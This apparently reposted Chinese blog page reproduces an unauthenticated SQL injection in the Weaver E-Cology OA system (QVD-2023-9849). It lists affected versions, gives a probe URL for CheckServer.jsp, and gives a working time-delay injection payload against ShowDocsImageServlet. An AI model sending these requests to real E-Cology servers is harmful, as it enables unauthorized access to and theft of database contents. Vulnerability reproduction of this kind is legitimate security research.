当前位置: 首页 > article >正文

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

1.漏洞描述

泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

影响版本:泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56

2.漏洞复现

POC

/mobile/plugin/CheckServer.jsp?type=mobileSetting

返回状态码200且参数值为{“error”;”system error”}证明漏洞存在

在这里插入图片描述

进行延时注入:

/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F
0%3A0%3A10 实际上表示 0:0:10 延时10秒

在这里插入图片描述


http://www.kler.cn/a/133013.html

相关文章:

  • async 和 await的使用
  • Python 使用Django进行单元测试unittest
  • 逆向攻防世界CTF系列37-crackme
  • 我的第一个PyQt5程序
  • Ubuntu+ROS 机械臂拾取和放置
  • 数据结构-二叉树及其遍历
  • Java中如何通过路径表达式找值:XPath和JsonPath以及SpEL详解及对比
  • 10. Spring源码篇之BeanPostProcessor
  • C/C++字符判断 2021年12月电子学会青少年软件编程(C/C++)等级考试一级真题答案解析
  • 计算机网络———ipv6简解
  • 【观察】华为:数智世界“一触即达”,应对数智化转型“千变万化”
  • 在Linux系统上检测GPU显存和使用情况
  • 【AI视野·今日Robot 机器人论文速览 第六十二期】Wed, 25 Oct 2023
  • 定时任务 Spring Task
  • RAAGR2-Net:一种使用多个空间帧的并行处理的脑肿瘤分割网络
  • mfc140u.dll丢失的解决方法,以及针对每个解决mfc140u.dll丢失办法的优缺点
  • 苍穹外卖--实现照片上传
  • npm私有云
  • 在Uni-app中实现计时器效果
  • Android Studio 写一个Java调用c++ 的demo
  • springMvc中的拦截器【巩固】
  • 爱上C语言:操作符详解(下)
  • 08-黑马点评项目发布笔记和查看笔记功能的实现
  • 微软Surface/Surface pro笔记本电脑进入bios界面
  • el-table中el-popover失效问题
  • Spring中用了哪些设计模式